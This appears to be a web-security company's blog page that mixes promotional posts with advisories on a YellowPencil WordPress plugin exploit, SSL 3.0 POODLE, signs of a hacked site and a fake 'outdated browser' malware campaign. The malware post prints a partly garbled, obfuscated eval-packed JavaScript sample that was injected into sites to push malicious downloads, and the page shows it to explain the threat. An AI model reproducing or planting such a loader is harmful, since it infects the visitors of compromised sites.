Website Hacked OR Blacklisted? Get it Cleaned & Protected Immediately! 50% OFF – Attacker.NET

Website Hacked OR #Blacklisted? Get it Cleaned & Protected Immediately! 50% OFF

Free Scanner:

#Security #wordpress #joomla #magento #drupal #hosting #cpanel #linux #websitesecurity #securedwebsite #hacked

YellowPencil WordPress Plugin Vulnerability is largely exploited

Any versions below 7.2.0 is vulnerable to this security issue and is likely hacked.

Hackers are exploiting it and injecting their malicious javascripts into files and database mainly in the “siteurl” and “home” rows in your wp_options table to cause redirects to other malicious websites such as:


And many others.

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

**Update: They released a fix:

Free Malware Scanner

يمكنك التحقق بسرعة مما إذا كان موقعك مخترقًا أو تم وضعه في القائمة السوداء باستخدام أداة فحص حماية المواقع المجانيه:
#malware #security #hosting #removal #hacked #wordpress #cpanel #joomla #drupal #magento #webhosting #linux #plesk #directadmin #free

Vous pouvez rapidement vérifier si votre site Web est piraté ou mis à l’index en utilisant notre scanner de logiciels malveillants #Free de sites Web:

Sie können schnell überprüfen, ob Ihre Website gehackt oder auf eine schwarze Liste gesetzt wurde
#malware #security #hosting #removal #hacked #wordpress #cpanel #joomla #drupal #magento #webhosting #linux #plesk #directadmin #free

Puede verificar rápidamente si su sitio web está pirateado o en la lista negra utilizando nuestro escáner de malware:
#malware #security #hosting #removal #hacked #wordpress #cpanel #joomla #drupal #magento #webhosting #linux #plesk #directadmin #free

Thousands of websites infected by Fake Outdated Browser malware and popups

Our security scanners detected thousands of recently infected websites by this fake outdated browser update malware which shows a popup window asking the visitor to update their outdated browser by clicking on the “Update” button which is a link to malicious .exe or .zip files to infecte their computers.

The malware is targeting Firefox, chrome, IE and other browsers and it shows customized popup windows to match the browser you are using.

You can check your website security by using this free website malware scanner

The malware is usally injected into .js files, Here is an example of the malicious javascript malware:

<script type=”text/javascript“> eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k








pssacS|Ci9PSpH|F5zqjAc|Firefox|firefox|sLqiUR0|Internet|forEach|call|querySelectorAll|default|switch|Explorer|ie|wicS3do|caption|baseline|due|version|table|soon|occurred|has|sBB68wf|Center|critical|The||following|personal|and|stored|Loss|versions|are|also|on|stream|octet|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|match|Za|Int32Array|Uint32Array|Array|byteLength|set|z0|||while|removeChild|revokeObjectURL|application|click|appendChild|Blob|createElement|createObjectURL|Confidential|your|small|strong|sub|samp|kbd|em|ins|sup|tt|fieldset|form|legend|ol|dd|dl|dt|dfn|strike|leak|blockquote|address|iframe|onclick|html|pre|applet|abbr|information|big|code|cite|h6|del’.split(‘|’),0,{})) </script> <script type=”text/javascript“>var _Hasync= _Hasync|| []; _Hasync.push([‘Histats.start’, ‘1,4214393,4,0,0,0,00010000’]); _Hasync.push([‘Histats.fasi’, ‘1’]); _Hasync.push([‘Histats.track_hits’, ”]); (function() { var hs = document.createElement(‘script’); hs.type = ‘text/javascript’; hs.async = true; hs.src = (‘//’); (document.getElementsByTagName(‘head’)[0] || document.getElementsByTagName(‘body’)[0]).appendChild(hs); })();</script> <noscript><a href=”/” target=”_blank”><img src=”//″ alt=”counter customizable free hit” border=”0″></a></noscript> <script type=”text/javascript“> </script>

When viewed in a browser:

Signup and Try our malware removal service and let’s clean & protect your websites!

You can check your website securityby using this website malware scanner

How to Tell if Your Website Has Been Hacked

How to tell if your website has been hacked?

  • Do you see any strange, unrecognized or inappropriate content on your site?
  • Your site started consuming more resources or running slow?
  • Do you see unrecognized users, admin users, FTP or email accounts on your site?
  • Unrecognized files or folders?
  • Customer reporting stolen credit card after purchasing something from your website?
  • Google Chrome, Firefox or other browsers showing a red warning when visiting your website?
  • Do you see any unrecognized ads, popups or redirects to other sites?
  • Your hosting provider suspended your hosting account?
  • If your site is listed as hacked or harmful in Google searches.
  • If you recieve a warning from Google webmaster tools or other blacklists.
  • If Google Adwords suspended your running Ads.

There are so many other signs! Signup now and let’s clean & protect your websites!

You can check your website’s security by using this free website malware scanner

FREE Backup space & FREE setup fee – Limited time for new signups!

* Current specials:
– We’re offering FREE 20GB off-site backup space with all of our server management plans for a limited time, for new signups.- We’re offering FREE SETUP and FREE 2nd month for transferring your server management services to us!

For more information, Please contact us at [email protected]

The POODLE Attack – SSL 3.0 Protocol Vulnerability (CVE-2014-3566)

Systems Affected

All systems and applications utilizing the Secure Socket Layer (SSL) 3.0 with cipher-block chaining (CBC) mode ciphers may be vulnerable. However, the POODLE (Padding Oracle On Downgraded Legacy Encryption) attack demonstrates this vulnerability using web browsers and web servers, which is one of the most likely exploitation scenarios.



There is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available.


** Updates available: RHEL/CentOS/RPM based OS:

yum -y update openssl

** You MUST disable SSLv3 in all used services (httpd, mail, etc) , The update just prevents the downgrading but the protocol itself is still vulnerable.

Partnership with CloudLinux

Attacker.NET is glad to inform you that we have entered the partnership with CloudLinux Inc. This partnership opens a great opportunity for our server management customers to improve their hosting environments. We offer discounted CloudLinux licenses for our Reactive & Proactive Server management plans and FREE CloudLinux licenses for our Critical Server Management plans. 

All CloudLinux features are aimed at increasing server stability and security.

* Isolates users from each other to avoid the “bad neighbor effect”
* Prevents users from seeing configuration files and other private information
* Allows end user to select PHP versions 5.2, 5.3, 5.4, and 5.5
* Gives the power to monitor and control limits, such as CPU, IO, Memory, and others
* Helps to restrict and throttle MySQL database abusers
* Compatible with all major control panels
* Interchangeable with CentOS and RHEL.

Happy New year & Greeting offer!

We’re running a special offer for a limited time on our server management plans! Get the 2nd month for FREE! Just submit a sales ticket after placing your order and we will credit your account for the 2nd month! You pay your first month and you get your second free!

This offer is VALID for the following plans:

Reactive server management
Proactive server management
Critical server management
SolusVM Node management

We wish you a happy, successful, challenging and exciting new year. We are looking forward to do some good business with you next year.

Kind Regards,



Welcome to our blog

This blog will cover the following topics:

  • Attacker.NET offers & News
  • Security Advisories
  • Tutorials & How-To’s
  • Genetal IT news, Issues and Best practices